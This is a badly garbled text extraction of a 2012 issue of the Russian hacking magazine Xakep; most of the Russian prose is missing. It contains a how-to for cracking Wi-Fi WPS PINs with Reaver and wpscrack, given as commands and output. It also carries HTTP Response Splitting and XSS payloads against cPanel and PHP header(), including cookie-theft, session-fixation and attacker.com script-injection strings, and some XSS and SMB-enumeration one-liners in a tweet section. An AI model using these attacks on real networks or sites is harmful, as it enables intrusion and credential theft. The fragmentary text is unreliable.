088
WWW.XAKEP.RU
03 (158) 2012
W3AF
: 230 .
WI-FI
018
WPS,
, .
5-10
WPA-.
024
082
124
HTTP RESPONSE SPLITTING
WINDOWS PHONE 7.5?
HIGHLOAD-
NGINX DJANGO
Intro
3 768
nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
PC_ZONE UNITS
UNIXOID SYN/ACK
MALWARE
PR-
step (step@real.xakep.ru)
(magg@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(grigorieva@glc.ru)
DVD
Unix-
Security-
ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)
ART
-
(alik@glc.ru)
PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906
,
- .
,
.
,
~50
WINLINK.
,
.
,
, ,
3 768
, . : 250 , 50 , 1.2
. ,
,
, , : .
,
.
, (5 ) ,
, , 30 ! ,
!
: :).
P.S.
. :).
nikitozz, . .
shop.glc.ru/xakep
vkontakte.ru/xakep_mag
03/158/ 2012
.: (495) 935-7034, : (495) 545-0906
TECHNOLOGY
(filatova@glc.ru)
(olgaeml@glc.ru)
(alekhina@glc.ru)
(polikarpova@glc.ru)
( )
(tatarenkova@glc.ru)
(gospodinova@glc.ru)
(dubrovskaya@glc.ru)
-
(bulanova@glc.ru)
(korenfeld@glc.ru)
(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)
:
DVD-: claim@glc.ru.
: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002.
Scanweb, . 219 833 .
.
. ,
, . .
.
: content@glc.ru.
, , 2012
001
Content
008
HEADER
004
011
MEGANEWS
hacker tweets
-
14
QR-
016
017
Proof-of-concept
: Pastebin.com
COVERSTORY
030
COVERSTORY
COVERSTORY
018
024
Wi-Fi
10
WPA Wi-Fi
WPS
048
070
PCZONE
038
042
048
?
-
CAPTCHA
-
w3af
UNIXOID
104
108
110
052
056
062
066
070
074
Easy-Hack
PHP- Windows
I can crack it!
-,
SMS: 30 !
X-Tools
SYN/ACK
114
120
124
076
082
2011
130
138
094
096
100
Google Chrome
Google
/++
,
!
USB 3.0
Edifier R2500
2.0
WEXLER.BOOK T7055
, ,
140
143
144
088
nginx Django
FERRUM
136
MALWARE
Linux-
-
Fedora
Linux
110
FAQ UNITED
FAQ
8.5
WWW2
web-
MEGANEWS
WPS
WPS (Wi-Fi
Protected Setup)
,
US-CERT.
,
D-Link, Netgear, Linksys Buffalo.
,
PIN-,
.
PIN, ,
, Wi-Fi .
US-CERT :
PIN-
,
EAP-NACK .
, ,
PIN- .
, PIN-.
,
:
10^8 10^3 + 10^4, 11 .
Cover Story .
,
,
,
.
,
WPS.
( YOTA)
LTE .
63
,
150.
004
USB 3.0
, ,
. CES ,
2012 2013 .
LINUX MANDRIVA,
NGI,
.
,
.
GOOGLE
. British
Telecom
.
, APT-,
Sykipot, , ,
-, .
, -
.
Sykipot AlienVault.
ActivIdentity ActivClient,
-, .
PIN-, .
AlienVault ,
2011 ,
.
PIN-. Sykipot
.
, , ,
.
WINDOWS PHONE
MARKETPLACE
50 .
14
(Android Market
19).
IPHONE DEV-TEAM,
-,
iOS 5.01
iPhone 4S iPad 2.
.
03 /158/ 2012
MEGANEWS
,
- ?
SOPA
PIPA
RAZER
:
10,1
1280 x
800 ,
Dolby
7.1 (
THX),
Wi-Fi 802.11b/g/n
Bluetooth 3.0.
.
Razer ( )
. , , Razer.
Project Fiona ,
CES 2012.
, , , .
(
) . , . , Project Fiona
Intel Core i7 . , Intel.
,
-
. , , . Razer . ,
.
$1000.
- .
ZAPPOS.COM 24
,
006
SOPA (Stop Online Piracy Act) PIPA
(PROTECT Intellectual Property Act),
, .
, , : (,
, .)
( )
.
,
. .
. , ,
, ,
.
, . , ,
. , , MPAA, RIAA
BSA ( Microsoft, Apple, Adobe,
Intel . .). Google, Twitter, Mozilla,
Facebook, Yahoo, eBay . X,
,
.
, ,
.
,
. Reddit . Google
. WordPress. blackout
.
SOPA. ,
GoDaddy, SOPA, -: GoDaddy.
,
TechCrunch , GoDaddy
- SOPA... ,
.
BSA, , SOPA . ,
, ,
.
SOPA 18
blackout,
. ? , SOPA, ,
, .
. PIPA . ? .
,
, ,
. . .
03 /158/ 2012
BUFFALO CLOUDSTATION
1
7
Buffalo
.
Windows,
MAC OS.
Time Machine.
Buffalo CloudStation
NAS.
: ,
.
BitTorrent-
iOS Android
03 /158/ 2012
(15017545 ),
,
, .
Webaccess
,
Buffalo.
,
: ,
.
Buffalo CloudStation
. ,
, ,
,
.
SATA-II
1 2 .
26 .
,
4
,
.
NAS', Buffalo
CloudStation BitTorrent-
web-.
p2p-: .
007
MEGANEWS
HMEI7 , Siemens.
QR-
MEGAUPLOAD
Megaupload, , , 4% -.
, , , .
Dotcom
. : 20 , 20
! ,
.
.
, Megaupload
. $500 .
,
( -)
$175 .
: , -
FileSonic
(, , ):
, , .
Anonymous
, , , RIAA,
MPAA , -
.
. QR,
,
.
Websense ThreatSeeker Network -,
QR-. , - .
2tag.nl , QR- URL. ,
QR-, .
QR-,
, (
QR-).
:
. ,
.
comScore, 14
18
34
QR-.
QR-
.
THUNDERBOLT
WINDOWS.
DigiTime. ( ), ,
Sony, Asus, Gigabyte Technology ASRock,
Thunderbolt .
.
008
IPV6-
2013 .
2015 IPv6
.
ANDROIDINVASION
GOOGLE , Google
.
03 /158/ 2012
,
GROUP-IB,
.
, IT-:
, Linux.
):
( ):
-
5
"
,
"
:
,
e,
Ariadn
.
, (
Group-IB) :
,
. , ,
:
iPad 2 Wi-Fi 3G 16 Gb.
,
.
:
.
!
:
www.xakep.ru/post/58241/
!
!
MEGANEWS
FACEBOOK Windows,
SAMSUNG PLS-
-
CES 2012
. CES , , , ,
.
, ,
S27B970 Samsung, 9-
-. 27-
, PLS (Plane Line
Switching). , IPS (In-Plane Switching)
Samsung. IPS-
, -
.
Samsung, , : PLS-, ,
,
, . . ,
Samsung .
S27B970 ,
(
- USB-),
.
9- 10 ,
.
QHD (2560 x 1440), DisplayPort,
Dual Link-DVI HDMI, 7 Mobile High Definition
Link (MHL)
.
Samsung Natural Color Expert,
. S27B970
,
,
- . , -
, Samsung 9
. ,
(!)
. -, ,
.
, (
),
. , .
, PLS
,
,
: PLS-
.
, ( , ,
). S27B970
$1199.
: 2560 1440
: 1,07
: 300 /2
(.): 90%
():
1000:1
(GTG): 5
(/.): 178/178
APPLE SAMSUNG
ELECTRONICS ,
GALAXY TAB 10.1
(!)
010
03 /158/ 2012
#hacker tweets
@NeckbeardHacker:
linux.js. ,
JavaScript-
Linux.
?
@cBekrar:
Vupen
PWN2OWN.
,
...
@meder:
: CVE-2011-3923.
Struts2: http://bit.ly/yFjhxr.
:
,
. , , Java
, RCE- ( ,
Java ), !
...
@RolfRolles:
-:
http://bit.ly/zIqZ5K .
:
... , ,
.
PhoneAndroid:
, -: ...
bit.ly/yoLmba.
Chroot-ing Windows
, :, :, :...
http://bit.ly/yQQqmN.
:
, ...
:
;).
@_sinn3r:
@cBekrar:
#fail-
McAfee Security-as-a-Service,
ActiveX,
bit.ly/xbJtqP via @thezdi.
obj.ShowReport
"calc.exe". ... .
, 0-day ZDI 12 . :) ...
@martincronje:
: HTML5 !=
CSS JavaScript-
jQuery.
@i0n1c:
,
!
...
...
@mikesica:
, ,
.
@jcran:
-- irb> (1..254).each
{|x| puts "host - 10.0.0.#{x}";
`smbclient -L 10.0.0.#{x}
-Uguest -N`}.
:
@f0rki:
PHP :
perchance (condition) { // Code
here } otherwise { // Code here }.
@garethheyes:
XSS- : <xml
ID=xss><x><IMG src=1
onerror=alert(1)></x></
xml><SPAN DATASRC=#xss DATAFLD=$Text
DATAFORMATAS=HTML></SPAN>.
Ruby- ...
@roman_soft:
@stephenfewer:
'Frinder' http://bit.ly/xrUBiW.
03 /158/ 2012
@Ivanlef0u:
BinScope:
http://bit.ly/yzcQYR .
NX, SafeSEH, /dynamicbase, . .
011
MEGANEWS
(CSDN).
,
,
,
- .
,
.
, (,
, ). ,
,
, . ,
, .
: ,
.
. !
. . :) , ,
.
. , . , , -
, , ,
.
: webpolit.livejournal.com/72397.html.
Seagate
Samsung .
$1,375 .
012
NGINX
,
Microsoft IIS. NetCraft,
Apache
(57,93 %).
BSOD WINDOWS 7
Windows 7 x64
w3bd3vil.
win32k.sys
( Win XP),
. , 32-
, 64-
- BSOD,
.
: ,
, ,
. , HTML-. Safari ,
.
iframe
. 64-
Windows 7, , ,
.
.
TORRENTFREAK , Crysis 2
BitTorrent PC
2011 . Call
of Duty: Modern Warfare 3
Battlefield 3.
Twitter
Google . Google .
03 /158/ 2012
MICROSOFT,
ARM-
.
, EDIFIER
Microsoft
,
. , .
2011- Microsoft ,
Windows 8 Secure boot (
UEFI). : UEFI
. , , , UEFI. ,
. Linux-
,
Linux ,
- Linux Windows 8
.
Microsoft ,
Linux ,
, . ,
Windows,
. ,
.
Microsoft ,
Windows 8. , ,
. .
, Windows 8 ,
116: , ARM, Secure Boot
.
Secure Boot , Pkpriv.
Secure Boot UEFI
,
.
, Microsoft ,
Secure Boot,
, ARM-. , ARM,
.
Linux ( ) . ,
, Windows 8,
Linux .
: ?
, .
,
. ,
UEFI, .
, , Microsoft
, Linux, Android ARM-.
Edifier
. 2.0.
- R1500TM ,
. Edifier
( ), -
18- . ,
RCA, , .
R900T.
2.0-, 4-
- 13-
, ,
. R900T
: 140 226 197 .
3,5-
RCA RCA RCA,
, , .
:
Edifier
12
.
.
.
MEGASEARCH.CC
,
03 /158/ 2012
013
MEGANEWS
!
,
PWN2OWN
Pwn2Own,
,
(,
) . ,
. Microsoft
Internet Explorer, Apple Safari,
Google Chrome Mozilla
Firefox Windows 7 Mac OS Lion
( ).
.
Hewlett-Packard.
60 , 30
15
, .
Google
Chrome. 20 sandbox-
Chrome. 10
sandbox- Chrome,
.
,
Pwn2Own. , .
.
,
.
Pwn2Own 7 9 . , !
D- , .
( ,
iModela)
,
, .
, , .
, .
-
The Pirate Bay
3D-, -
.
- ,
.
Warhammer 40 - 1970 .
, , 3D- .
,
!
, ,
. ,
.
3D-
RepRap
,
.
Mendel,
(
).
$520.
SONY
XQD.
, .
\
XQD
1 / (125 /).
.
QD-H16 16
$130, QD-H32 32 $230.
.
014
FACEBOOK HACKERCUP,
.
- Facebook,
.
TIOBE SOFTWARE
OBJECTIVE-C
.
-
Java, C,
C# C++.
03 /158/ 2012
SYMANTEC
Symantec,
,
, . Symantec,
, 2006 .
, .
, Norton Antivirus Corporate Edition, Norton
Internet Security, Norton SystemWorks pcAnywhere 12.0,
12.1 12.5. ,
Yama Tough, ,
Lord of Dharmaraja, ,
Norton Utilities.
,
,
Norton Antivirus. , ,
1999 . , Symantec ,
. .
,
. ,
Symantec ( ).
,
, ,
. Symantec
,
scareware-, , .
Symantec,
, , .
, ,
.
LUMINANT MEDIA
93-
ANONYMOUS
03 /158/ 2012
015
HEADER
.
.
KeyPass (keepass.info),
.
,
, . ,
,
? :)
, ,
, KeyPass,
, !
.
1Password (agilebits.com/onepassword), Mac,
Windows.
, $69.99
. , . , -,
LastPass (lastpass.com),
. ,
. -,
(Windows, Linux, Mac),
.
(Firefox, Internet Explorer, Chrome, Safari,
Opera). ($1 )
. -, LastPass
,
,
.
- ,
.
- ,
. -, LastPass ,
016
Dropbox.
- ( ),
. ! :)
LASTPASS
, LastPass, .
, .
LastPass ,
. , Sesame
-.
. -,
Sesame .
, ,
-. !
LastPass
Sesame ( ), ,
, .
Google
Yubikey $25
(store.yubico.com), Google. ,
(Google Authenticator),
.
Gmail,
LastPass.
(helpdesk.lastpass.com/security-options/
google-authenticator).
,
.
$12
.
LastPass
LastPass
,
, . LastPass
, ( 123456). ,
,
.
03 /158/ 2012
Proof-of-Concept
PASTEBIN.COM
- Pastebin.com.
,
,
. .
, .
Lulzsec
( , ) Pastebin.com.
. (pastebin.
com/trends) , :
- Facebook;
- , e-mail
;
IP-
.
:
.
. .
, , ,
.
, , Pastebin.
com, :
Pastie, FrubarPaste, YourPaste, Codepad, Slexy
LodgeIt. PoC
. ,
,
.
, , .
: , malc0de (bit.ly/An58Yd)
NeonTempest (bit.ly/zRuK7o). , ,
PastyCake 9b+ (bit.ly/xHXdfH),
.
Pastebin.com Pastie.org ,
.
SQLite.
MongoDB MySQL. -
Python, :
python gather.py -k kwords -o urls.db \
-a ~pastycake@gmail.com~ harvest
'harvest'
.
e-mail.
-o
. -k
,
. , ,
, . ,
, , .
,
PastyCake, , :
DEFAULT_KEYWORDS = [
'password',
'hack',
]
,
, .
.
, ,
.
, Twitter- PastebinLeaks (twitter.com/#!/
PastebinLeaks), -
Possible Massive mail/pass leak
http://pastebin.com/L6YbD136
Possible listing of http passwords
http://pastebin.com/qZbccMB7
Possible Juniper configuration with
password http://pastebin.com/9vuwzjnS
..
Python
03 /158/ 2012
Trending Pastes ?
,
. z
017
COVERSTORY
(ivinside.blogspot.com)
WPA-
WI-FI
WPS
018
03 /158/ 2012
HOWTO: Wi-Fi 10
HOWTO:
WI-FI
10
, ,
WPA2, .
. - ,
, GPU. ,
,
WPS.
03 /158/ 2012
WWW
WARNING
,
Google
Docs:
goo.gl/3zjfP
.
.
019
COVERSTORY
PIN- bruteforce. .
WPS
PIN- WPS
1. PIN- WPS,
,
,
. ,
.
,
,
,
.
, ,
.
/
. ,
.
WPS (Wi-Fi Protected Setup).
,
, - WPA-.
PIN,
, !
. WPS.
. ,
WPS (, ,
), PIN
!
2. PIN- WPS
() (),
.
.
2. PIN- -.
PIN- ,
( 1),
.
,
.
3. PIN- ( 2).
WPS,
,
PIN-. .
.
! ,
, PIN-
,
10^8 (100 000 000) . . ,
PIN- , .
10^7 (10 000 000) .
! WPS (
3). , ,
. , PIN-
.
, ! :
1. M4 EAP-NACK,
, PIN-
.
2. EAP-NACK M6, , ,
PIN- . 10^4 (10 000)
10^3 (1
000) .
11 000 .
, ,
.
3.
. WPS-:
WPS?
WPS .
.
, -
.
(, ):
PIN, . ,
(Cisco/Linksys,
Netgear, D-Link, Belkin, Buffalo, ZyXEL)
WPS. .
WPS:
1. Push-Button-Connect (PBC).
020
3. WPS
03 /158/ 2012
HOWTO: Wi-Fi 10
, .
-, M3.
,
,
. ,
,
.
wpscrack (goo.gl/9wABj), Python.
Scapy, .
Linux-,
.
, MAC- , MAC-
(SSID).
$ ./wpscrack.py --iface mon0 \
--client 94:0c:6d:88:00:00 \
--bssid f4:ec:38:cf:00:00 --ssid testap -v
sniffer started
trying 00000000
attempt took 0.95 seconds
trying 00010009
<...>
trying 18660005
attempt took 1.08 seconds
trying 18670004
# found 1st half of
PIN
attempt took 1.09 seconds
trying 18670011
attempt took 1.08 seconds
<...>
trying 18674095
# found 2st half of
PIN
<...>
Network Key:
really_really_long_wpa_passphrase_good_
luck_cracking_this_one
<...>
,
PIN-, ,
. ,
,
(61 )
.
, wpscrack
,
:
Tactical Network Solutions. ,
PoC ,
Reaver (code.google.com/p/reaver-wps).
WPS-PIN PSK-, ,
.
.
,
WPS .
HOW-TO
, Linux.
, Reaver BackTrack
(backtrack-linux.org),
-
- WI-FI
1. WEP (Wired Equivalent Privacy)
.
,
RC4.
airodump-ng
aircrack-ng, .
wesside-ng,
WEP
.
2. WPA/WPA2 (Wireless Protected Access)
-
03 /158/ 2012
WPA/WPA2 (
WPA Handshake,
). ,
. , ,
, NVIDIA
CUDA ATI Stream
GPU. aircrack-ng ( ),
cowpatty ( ), pyrit
( ).
4. - PIN- WPS
.
.
0.
BackTrack 5 R1
VMware
ISO. .
,
UNetbootin (unetbootin.
sourceforge.net) :
, ,
, .
1.
root:toor. ,
(
BackTrack GNOME, c KDE):
# startx
2. Reaver
Reaver,
.
(Applications Internet Wicd Network
Manager). ,
:
# apt-get update
# apt-get install reaver
, 1.3,
. , ,
021
COVERSTORY
, , SVN. , ,
(
).
$ svn checkout http://reaver-wps.
googlecode.com/svn/trunk/ reaver-wps
$ cd ./reaver-wps/src/
$ ./configure
$ make
# make install
BackTrack
.
Arch Linux, ,
, PKGBUILD:
$ yaourt -S reaver-wps-svn
3.
Reaver :
;
;
MAC- (BSSID);
, WPS.
,
:
# iwconfig
( wlan0) ,
( ,
Reaver, ).
:
# airmon-ng start wlan0
,
(
mon0).
BSSID.
airodump-ng:
# airodump-ng mon0
.
WPA/WPA2
PSK. ,
.
,
kismet,
. ,
WPS. Reaver (
SVN) wash:
# ./wash -i mon0
, .
-f cap-, ,
, airodump-ng.
Reaver BackTrack wash. ,
.
4.
PIN. Reaver
.
(
) BSSID
:
-vv
, ,
.
Reaver v1.4 WiFi Protected Setup Attack
Tool
Copyright (c) 2011, Tactical Network
Solutions, Craig Heffner <cheffner@
tacnetsol.com>
[+] Waiting for beacon from
00:21:29:74:67:50
[+] Associated with 00:21:29:74:67:50
(ESSID: linksys)
[+] Trying pin 63979978
PIN , ,
, .
. ,
PIN,
. , :
[+] Trying pin 64637129
[+] Key cracked in 13654 seconds
[+] WPS PIN: '64637129'
[+] WPA PSK: 'MyH0rseThink$YouStol3HisCa
rrot!'
[+] AP SSID: 'linksys'
, ,
WPA-PSK, . ,
.
5. c Reaver
022
WPS . , ,
.
, , ,
, . ,
,
. ,
WPS
PIN-,
90 . ,
,
? z
03 /158/ 2012
HOWTO: Wi-Fi 10
FAQ
?
,
A ,
.
Aircrack-ng (bit.ly/wifi_
adapter_list). ,
,
RTL8187L. USB
$20.
"timeout" "out of order"?
-
A
. ,
WPS.
Reaver
, WEP
?
WEP
A
,
(IV),
. ,
- , -
.
WPS
Reaver
PIN-. -
,
,
WPS-. WPS
. ,
,
,
.
ALFA Network
dBi, ,
.
MAC-?
, MAC A mon0,
.
, , wlan0.
Q
A
Reaver
PIN, ?
,
WPS. -
wash: ,
.
Q ?
-
A ,
.
"rate limiting detected"?
,
A WPS.
(
),
(
).
Reaver
1.3, -
.
'--ignore-locks'
SVN.
Reaver
?
,
A ,
,
REAVER
HOWTO
Reaver. WPS
,
. ,
.
5. WPS
, , . Reaver
315 ,
:
# reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
1. SSID :
# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
2. '--dh-small',
,
:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
3. .
:
# reaver -i mon0 -b 00:01:02:03:04:05 -t 2
6. WPS
PIN-,
. Reaver ,
'--nack':
# reaver -i mon0 -b 00:01:02:03:04:05 --nack
7. '--eap-terminate' ,
WPS- EAP FAIL:
# reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate
4. .
:
8. WPS- ,
PIN-,
. Reaver ,
'--fail-wait':
03 /158/ 2012
023
COVERSTORY
DVD
.
, 2002
HTTP- ,
,
.
,
PHP.
024
WWW
03 /158/ 2012
INTRO
: .
, . ,
-
, , , .
(, eval) ,
$_GET['aaa']. ,
. , ,
, .
? ,
- , , .
,
, ,
HTTP Response Splitting.
HTTP-. - ,
HTTP- (
).
, , HTTP-
. ,
03 /158/ 2012
HTTP-
, Cache Poisoning, Crosssite Scripting (XSS) , , Page Hijacking.
cPanel 2010 .
, header("Location:
".__).
:
http://server.com:2082/login/?user=foo&pass=bar&failurl=
%0D%0AContent-Type:%20text/html%0D%0A%0D%0A%3Cscript%3Eale
rt%28%22
Recognize-Security%20-%20%22%2Bdocument.cookie%29;%3C/
script%3E%3C!--
XSS:
HTTP/1.1 307 Moved
Server: cpsrvd/11.25
Connection: close
Content-length: 206
Location:
Content-Type: text/html
<script>alert("Recognize-Security - "+document.cookie);
</script><!-Content-type: text/html
<html><head><META HTTP-EQUIV="refresh" CONTENT="0;URL=
Content-Type: text/html
025
COVERSTORY
<script>alert("Recognize-Security "+document.cookie);
</script><!--"></head><body></body></html>
, -
header("Location: "
.$_GET['backto_url']) header("Location: /index.
php?lang=".$_GET['lang']). Open Redirect,
. ,
HTTP
Response Splitting, ,
PHP ( 2006- ) %0d%0a .
,
.
header() , , ,
.
DISCLAIMER
ZeroNights, . ,
,
, cookies.
, ,
, smuggling-,
.
HTTP
( HTTP), , HTTP-.
bit.ly/r9pLL, 6 Response (bit.ly/BEAq4).
HTTP- :
RFC-2616
Response = Status-Line; Section 6.1
*(( general-header; Section 4.5
| response-header; Section 6.2
| entity-header ) CRLF); Section 7.1
CRLF
[ message-body ]; Section 7.2
,
CRLF, . URL CRLF %0D%0A.
. ,
CRLF,
.
CRLF PHP
header() (bit.ly/wVbbcd) PHP
HTTP- . . , -
<?php
header("Location: /basic/".$_GET['redirect'].".html");
?>
Warning, :
test.php?xxx=bbb%0a%0dNew-Header:blabla
Warning: Header may not contain more than a single
header, new line detected. in test.php on line 2
,
. ,
:
/* new line safety check */
char *s = header_line, *e = header_line + header_line_
len, *p;
while (s < e && (p = memchr(s, '\n', (e - s)))) {
if (*(p + 1) == ' ' || *(p + 1) == '\t') {
s = p + 1;
continue;
}
efree(header_line);
sapi_module.sapi_error(E_WARNING, "Header may not
contain more than a single header, new line detected.");
return FAILURE;
}
,
LF ( URL- %0A). , - (%09) (%20), . ,
CRLF, LF-. RFC,
, . , RFC
? , . - :
,
Refresh-
026
<?php
header("X-Test1:1\r\n Set-cookie: is1=OK");
header("X-Test2:2\r\n\tSet-cookie: is2=OK");
echo "<script>alert(document.cookie)</script>";
?>
03 /158/ 2012
, Internet Explorer
. , - RFC
, ,
header() IE, ,
Open Redirect. .
.
header() 2006
,
.
Internet Explorer. , .
, PHP %0a (\n LF).
, - ,
.
.
:
#!/usr/bin/perl
use strict;
use warnings;
use Socket;
. . .
listen SERVER, 10;
my $answ = "HTTP/1.1 200 OK\r\n";
for($i=0;$i<256;$i++){
$answ.="Set-cookie: cook-$i=1".chr($i);
}
$answ .="\r\n\r\n<h1>Test splitting bytes</h1>";
. . .
: ,
- (, ,
) ,
CRLF (%0d%0a). -,
HTTP- ,
Set-cookie, 256 .
, - ,
, ,
<N>Set-cookie:... , ,
, , , . ,
, :-). ,
( ).
:
IE 8/9 %0d
Firefox 7 Opera %0d
Chrome %0d %00 (Issue 95992 fixed in rel. 15)
Safari %0d
, , Firefox, CR , CRLF.
,
,
- -! , ,
, 14- Google Chrome,
-
03 /158/ 2012
setcookie()
setcookie()
-. . 95992 Low (
,
, , , ).
15- - ,
, , 17-
. Firefox ,
, RFC. ,
.
XSS
header(),
.
.
client-side-: ,
.
, Content-Length,
, HTTP-.
header() PHP ContentLength 0, . ,
HTTP Response Splitting ( HTTP-)
, Content-Length .
, . , Internet Explorer,
, HTML- , Content-Length.
6- 9- .
-:
<?php
header("X-Header: aaa".$_GET['r']);
?>
Internet Explorer
HTTP-:
027
COVERSTORY
/index.php?r=foobar%0d<html>%0d<h1>TEST</h1>
. , .
XSS-,
:
/index.php?r=foobar%0d<html>%0d<script>
alert(/Splitting/)</script>
, - , . ,
,
. XSS- Internet Explorer,
9-
, , , X-XSS-Protection: 0. ,
,
.
HTTP- :
/index2.php?r=foobar%0dX-XSS-Protection:0%0d<html>%0d
<script>alert(/xss/)</script>
. IE , X-Content-Type-Options,
. . : ( Content-Length).
, header("Location: /index.php?lang=".$_GET['lang'])
Open Redirect
?lang=aaa%0dLocation:http://yandex.ru. ,
, .
( ), .
, Access-Control-Allow-Origin ,
, Opera,
Internet Explorer 8+, Firefox 3.5+, Safari 4+ Google Chrome.
(mzl.la/4srnwm).
,
Access-Control-Allow-Methods, Access-Control-AllowHeaders, Access-Control-Max-Age (
).
, , . Access-Control-AllowOrigin ,
. , , , XHR . ,
Access-Control-Allow-Origin: *
.
RFC, , ,
, , , .
Interner Explorer HTTP-.
,
, .
, Content-Length
, , RFC, HTTP
. ,
, .
, header(). , - ,
. , , : header(), setcookie() setrawcookie().
, ,
header(), $path $domain.
,
. ,
. .
,
header():
, ContentLength, , HTTP-
.
, , X-XSS-Protection,
XSS- Internet Explorer,
1. X-Frame-Options. ,
iframe/frame-.
X-Frame-Options:
allow-from attacker.
2. X-Content-Security-Policy.
,
. ,
X-Content-SecurityPolicy: allow 'self', <script src="http://attacker.com/1.js"><script>
. ,
X-
028
,
, ,
.
: foobar:%0dSetCookie:PHPSESSID=FAKED%0dLocation=/
auth.php. ,
,
.
99 % -
Session Fixation (
).
03 /158/ 2012
IE HTML- Content-Length,
return FAILURE;
}
if (!url_encode && value && strpbrk(value,
",; \t\r\n\013\014") != NULL) {
/* man isspace for \013 and \014 */
zend_error( E_WARNING, "Cookie values can not contain
any of the following',; \\t\\r\\n\\013\\014'" );
return FAILURE;
}
strpbrk() ,
. ,
.
.
(, ) strpbrk (php.su/functions/?strpbrk),
. , ,
- ! , PHP
,
- ,
. - .
, . ,
, = .
( 2010
).
COOKIES
- , ,
. setcookie() setrawcookie()
.
. , .
,
, .
, .
,
, .
, , :
<?php
setcookie("param0","PREFIX_".$_GET['p0']);
?>
4096 . , .
! ,
, .
Session Fixation.
:
03 /158/ 2012
XSS- IE
chrome 4096
safari 4091-LEN(cookie_name)
opera 4096
firefox 4096
iexplore 5116-LEN(cookie_name)
, RFC: www.ietf.org/rfc/rfc2109.txt.
RFC at least
20 cookies per unique host or domain name. , 20 20
. . , 1997-
, ,
, .
, RFC, ,
, , .
:
chrome 180
safari ~2800/LEN(cookie_name+cookie_val)
opera 60
firefox 149
iexplore 49
OUTRO
, .
,
HTTP Response Splitting, . ,
.
(oxod.ru).
! z
029
COVER STORY
rabota.ru,
.Ru.
@Mail
il.Ru Group.
- Ma
PRUFFI.
030
03 /158/ 2012
.
, ,
. ,
.
. ,
.
, , .
, .
, Gmail -
.
, ,
Google. :)
, . ,
PRUFFI .
. 5060
, .
800 .
PRUFFI 60 000 90 000 . . :)
PRUFFI FRIENDS
- .
?
, .
, ,
15
:
, .
,
.
.
PRUFFI Friends (apps.facebook.com/pruffi_
03 /158/ 2012
friends). , . ,
.
,
:
,
.
.
.
,
. ,
800 ,
?
,
?
.
. , , .
. ,
.
, .
. , ,
,
. -
,
,
1000 .
.
.
, ,
.
PRUFFI .
: 400
. 600 .
- : , - 700
1,5 .
,
(pruffi.
ru/analitika). , , 3040 % , . ? .
, Ruby
100
, ,
.
Ruby- 60 ,
, .
,
.
?
!
, IT .
, .
,
20 , !. ,
.
, ,
.
, (Product Manager'),
, 30. ? ,
. ,
. :) :
,
( ), . ,
. .
,
.
031
COVER STORY
-, :
,
.
- !
. HR-: ,
.
. ,
. :)
. .
. .
, ,
.
Facebook Google,
Foursquare, LinkedIn
. , ,
LinkedIn, - , Groupon.
! ,
.
, . ,
, .
( -)
, ,
. Zynga
, .
Zynga,
, .
.
PRUFFI
.
.
: $500 000
$500 000.
.
,
,
: ,
,
.
!
. ,
,
.
,
, ,
( /IT,
, , ). ,
, , ,
,
.
, .
032
.
. , ,
, -,
. .
? , , -,
,
(iOS,
Android, Symbian, Windows
Phone), .
.
.
.
:
PM (Product manager),
, PM,
. , ,
. :
, ,
. :
,
,
.
. , Omlet.ru,
Enter.ru . . .
.
, .
, . ,
.
. , , ,
,
.
Ostrovok.ru.
.
,
, .
, ,
. , , .
,
:
.
,
200 000 .
. , , ,
180200 .
100120
.
, - 140
. .
.
,
,
. . .
. ,
,
,
.
.
.
, , .
.
, PM
. ,
,
. . ,
. ,
-
, .
, ,
. :) ,
,
Molotok.ru,
Mail.ru.
:
1. Ruby 86 %,
40 %.
2. , , , .
3. .
4. , e-commerce,
50 %.
.
iOS Android. ,
-
03 /158/ 2012
.
, .
.
, ,
, ,
.
.
, .
, ,
. , - .
. ,
.
,
. :
,
.
, . Mail.ru :
, ,
.
,
.
, Mail.ru Group
. ,
. Futubra (futubra.com).
.
:
.
. .
, .
.
.
.
PHP-
Perl-.
Perl, , , . , Ruby,
Perl ,
C++ Java.
. . .
NDA (Non-disclosure
agreement ).
.
: ,
. - .
, . ,
- .
. . , Mail.ru,
, , .
, .
,
, -
. , . ,
- .
. , .
-
03 /158/ 2012
. ,
.
. ,
.
: .,
,
, .
, ,
Ruby. , .
: ,
HR-, , ? .
, .
,
,
. .
,
, .
: , ! !
, . ,
- ,
.
,
. .
, ,
,
.
.
, ,
. , ,
,
,
.
,
,
.
- ,
, .
. HR 90
. :
60 120
.
150, 60. .
1015 , 34
. HR
: .
. ,
. Google
,
.
.
.
, ,
033
COVER STORY
, ,
,
.
, , . ,
.
,
. , , .
, .
: ,
, ,
. ,
, ,
!. .
. , , PM, ,
.
, .
, , !
.
.
,
.
,
, , ,
, ,
.
?
, , ,
- , . , ,
.
. , .
.
, 19
: !
. ,
,
,
.
. ,
.
, .
. 30 . ?
, ,
.
, ,
:
,
, .
. , . , .
, ,
. ,
, .
, , ,
. ,
, .
,
,
,
.
,
.
, Mail.ru, - , .
,
.
, ,
. :
, . :
,
,
,
. -
. , :
,
. , ,
, , ,
- .
, 2829 , .
.
.
,
.
, Greenfield Project.
, . , ,
,
.
. ,
Mail.ru, Google
.
,
.
,
,
. ,
. ,
! :)
, , -
. .
, . ,
,
.
.
,
? , . ,
,
PRUFFI ,
.
, ,
, . z
034
03 /158/ 2012
(112011)
0-3
3-5
5-10
10
Team leader
40 000 - 80 000
30 000 - 70 000 *
Android, iOS
30 000 - 70 000
20 000 - 70 000 *
Perl/PHP
40 000 - 60 000
30 000 - 60 000 *
Ruby on Rails
30 000 - 60 000
0-3
3-5
5-10
10
Windows
30 000 - 50 000
50 000 - 70 000
Unix,Linux admin
30 000 - 60 000
20 000 - 60 000 *
60 000 - 90 000
60 000 - 90 000 *
40 000 - 80 000
40 000 - 80 000 *
0-3
3-5
5-10
10
40 000 - 80 000
